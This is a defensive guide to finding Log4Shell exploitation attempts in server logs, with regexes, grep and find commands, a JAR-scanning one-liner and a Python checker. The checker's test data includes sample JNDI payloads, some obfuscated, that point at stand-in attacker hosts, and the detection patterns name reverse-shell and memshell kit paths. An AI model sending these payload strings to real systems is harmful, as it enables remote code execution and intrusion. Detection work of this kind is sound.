You can use the following commands and rules to search for exploitation attempts against the Log4j RCE vulnerability CVE-2021-44228 (Log4Shell).
- RegEx
^(?:.(?:.(?:.(?:.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))|.(?:.(?=.(?:..jndi.))(?=.(?:..ldap.|..rmi.|..ldaps.|..dns.|..lower.|..upper.)))))
- Grep / Zgrep
This command searches for exploitation attempts in uncompressed files under /var/log and all of its subfolders:
sudo egrep -I -i -r '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
This command searches for exploitation attempts in compressed (.gz) files under /var/log and all of its subfolders (the glob is quoted so the shell does not expand it in the current directory):
sudo find /var/log -name '*.gz' -print0 | xargs -0 zgrep -E -i '\$({|%7B)jndi:(ldap[s]?|rmi|dns):/[^\n]+'
- Grep / Zgrep – Obfuscated Variants
These commands also catch obfuscated variants (e.g. ${lower:j}ndi), but because the file content is piped through sed and tr before grep, a match does not report the file name.
This command searches for exploitation attempts in uncompressed files under /var/log and all of its subfolders:
sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -I -i 'jndi:(ldap[s]?|rmi|dns):'" \;
This command searches for exploitation attempts in compressed (.log.gz) files under /var/log and all of its subfolders:
sudo find /var/log/ -name "*.log.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
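The same normalisation the sed/tr pipeline above performs (unwrapping ${lower:...} and, here also ${upper:...} and the %7B URL-encoded form matched by the grep rule), written as a small Python checker so it can be run against a log file and report line numbers. This is an added example, not part of the original page or of the Neo23x0 detector; the log lines and host names are constructed test data.

```python
import re
import urllib.parse
from typing import List

# Constructed sample access-log lines (not real traffic): a plain attempt,
# a ${lower:}/${upper:} obfuscated attempt, a URL-encoded attempt, and a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:ldap://attacker.example:1389/a} HTTP/1.1" 200 12
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://evil.example:1099/x}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fa%7D HTTP/1.1" 200 12
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} wrap one or more characters of the real payload;
# the wrapper is removed and the inner text kept, like the sed command above.
LOOKUP_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.IGNORECASE)
# Same protocol alternation as the grep rules on this page.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns):/", re.IGNORECASE)


def normalize(line: str) -> str:
    """Undo URL encoding and ${lower:}/${upper:} wrapping before matching."""
    # Decode twice so a double-encoded %2524%257B still becomes ${
    decoded = urllib.parse.unquote(urllib.parse.unquote(line))
    # Unwrap repeatedly: nested wrappers only disappear one layer per pass
    prev = None
    while prev != decoded:
        prev = decoded
        decoded = LOOKUP_WRAPPER.sub(r"\1", decoded)
    return decoded


def is_exploit_attempt(line: str) -> bool:
    """True if the normalised line contains a ${jndi:<proto>:/ lookup."""
    return JNDI_PATTERN.search(normalize(line)) is not None


def scan(log_text: str) -> List[int]:
    """Return the 1-based numbers of lines that look like exploitation attempts."""
    return [n for n, line in enumerate(log_text.splitlines(), 1) if is_exploit_attempt(line)]


if __name__ == "__main__":
    print("matching lines:", scan(SAMPLE_LOG))
```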
- Log4Shell Detector (Python)
A Python-based scanner that detects even heavily obfuscated forms of the exploit string.
GitHub – Neo23x0/log4shell-detector: Detector for Log4Shell exploitation attempts
- Find Vulnerable Software (Windows)
Lists JAR files under C:\ that contain JndiLookup.class, the class abused by the exploit:
gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
- Detects indicators of JNDI usage in log files and other payloads
ldap:\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\/
- Detects indicators in server logs of exploitation attempts against CVE-2021-44228
$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}
Recommendation:
Upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).